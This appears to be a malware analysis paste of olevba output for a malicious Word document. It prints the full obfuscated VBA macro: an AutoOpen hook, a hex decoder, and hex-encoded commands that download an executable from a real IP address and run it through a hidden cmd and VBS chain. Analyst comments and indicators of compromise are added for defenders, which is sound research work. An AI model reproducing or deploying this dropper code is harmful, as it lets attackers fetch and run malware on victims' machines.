dynamoo

Malicious Word macro

Apr 7th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIH-- vm1993lvw.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vm1993lvw.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Auto-exec entry point. The olevba ANALYSIS table for this stream flags
      ' AutoOpen as "Runs when the Word document is opened", so the only statement
      ' here, the call to sdf (defined in Module1), fires on open with no further
      ' user action beyond macros being allowed to run.
  16. sdf
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Sub sdf()
      ' Payload launcher: decodes three hex-encoded string fragments with
      ' HJbjbkljgIUGI (the hex decoder in Module2), joins them and passes the
      ' result to Shell.
      '
      ' Fragment 1 (runs second in the final command): decodes to a chain of
      ' "@echo ...>>gyuFYFGuig.vbs" appends. The script lines written include a
      ' TEMP-folder lookup and the target path "\dfsdfff.exe" under that folder.
  30. jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
      ' Fragment 2 (runs first): the literal is stored reversed and StrReverse
      ' restores it before hex decoding, a second obfuscation layer that olevba
      ' reports as "StrReverse+Hex". Decoded, it opens with "cmd.exe /c"; the
      ' ANALYSIS table attributes Microsoft.XMLHTTP, ADODB.Stream and the
      ' download URL / IPv4 IOC rows to this fragment.
  31. JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2837313e2934313e29333e2538313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
      ' Fragment 3 (runs last): further "@echo ...>>gyuFYFGuig.vbs" appends
      ' (savetofile, then a Shell.Application Open of the saved file), ending
      ' with "cscript.exe gyuFYFGuig.vbs" to execute the generated script.
  32. GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
      ' Assembly order differs from assignment order: fragment 2, then 1, then 3.
  33. sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
      ' Shell's second argument 0 is the hidden window style (vbHide), so no
      ' console window is shown to the user.
      ' Analyst note: gyuFYFGuig.vbs is written with no directory component, so
      ' it lands in the current directory of the process. Useful hunting pivots
      ' are the Office application spawning cmd.exe / cscript.exe, the .vbs and
      ' dfsdfff.exe file names, and HTTP to the bare IPv4 address in the IOC rows.
  34. Shell sdddd, 0
  35. End Sub
  36.  
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. ANALYSIS:
  39. +------------+----------------------+-----------------------------------------+
  40. | Type       | Keyword              | Description                             |
  41. +------------+----------------------+-----------------------------------------+
  42. | Suspicious | Shell                | May run an executable file or a system  |
  43. |            |                      | command                                 |
  44. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  45. |            |                      | strings                                 |
  46. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  47. |            |                      | Hex)                                    |
  48. | Suspicious | SaveToFile           | May create a text file (obfuscation:    |
  49. |            |                      | Hex)                                    |
  50. | Suspicious | Open                 | May open a file (obfuscation: Hex)      |
  51. | Suspicious | Shell                | May run an executable file or a system  |
  52. |            |                      | command (obfuscation: Hex)              |
  53. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  54. |            |                      | command (obfuscation: Hex)              |
  55. | Suspicious | Write                | May write to a file (if combined with   |
  56. |            |                      | Open) (obfuscation: Hex)                |
  57. | Suspicious | Shell.Application    | May run an application (if combined     |
  58. |            |                      | with CreateObject) (obfuscation: Hex)   |
  59. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  60. |            |                      | StrReverse+Hex)                         |
  61. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  62. |            |                      | StrReverse+Hex)                         |
  63. | Suspicious | Open                 | May open a file (obfuscation:           |
  64. |            |                      | StrReverse+Hex)                         |
  65. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  66. |            |                      | (obfuscation: StrReverse+Hex)           |
  67. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  68. |            |                      | be used to obfuscate strings (option    |
  69. |            |                      | --decode to see all)                    |
  70. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation: Hex) |
  71. | IOC        | dfsdfff.exe          | Executable file name (obfuscation: Hex) |
  72. | IOC        | cscript.exe          | Executable file name (obfuscation: Hex) |
  73. | IOC        | http://185.39.149.17 | URL (obfuscation: StrReverse+Hex)       |
  74. |            | 8/aszxmy/image04.gif |                                         |
  75. | IOC        | 185.39.149.178       | IPv4 address (obfuscation:              |
  76. |            |                      | StrReverse+Hex)                         |
  77. | IOC        | cmd.exe              | Executable file name (obfuscation:      |
  78. |            |                      | StrReverse+Hex)                         |
  79. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation:      |
  80. |            |                      | StrReverse+Hex)                         |
  81. +------------+----------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Module2.bas
  84. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module2'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
      ' Hex-string decoder: converts a string of two-character hex pairs into
      ' the corresponding characters and returns the decoded text.
      ' Parameter kZtkbozi: the hex-encoded input.
      ' Analyst note: this is plain hex-to-character decoding with no key, so
      ' the strings can be recovered statically (the olevba ANALYSIS output on
      ' this page points at its --decode option) without running the macro.
  87. Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
  88. JvigRuKAuHzAIK17 = 2912
      ' The loop below only accumulates 0..65 into JvigRuKAuHzAIK17, a value
      ' that is never read again in this function; it appears to be filler
      ' (junk code), not part of the decoding.
  89. For CqINRagdDXnLii12 = 0 To 65
  90. JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
  91. DoEvents
  92. Next CqINRagdDXnLii12
  93.  
      ' Walk the input two characters at a time.
  94. For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
      ' Chr$(38) & Chr$(72) builds the "&H" hex-literal prefix at run time, so
      ' the literal never appears in the source; Val("&Hxx") gives the numeric
      ' value of the pair and Chr$ turns it into one character.
  95. UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
  96. ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
  97. Next TQmHIRcQAPjC
      ' Assigning to the function name sets the return value.
  98. HJbjbkljgIUGI = ePUuigaspLiGL
  99. End Function
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101. ANALYSIS:
  102. +------------+---------+-----------------------------------------+
  103. | Type       | Keyword | Description                             |
  104. +------------+---------+-----------------------------------------+
  105. | Suspicious | Chr     | May attempt to obfuscate specific       |
  106. |            |         | strings                                 |
  107. +------------+---------+-----------------------------------------+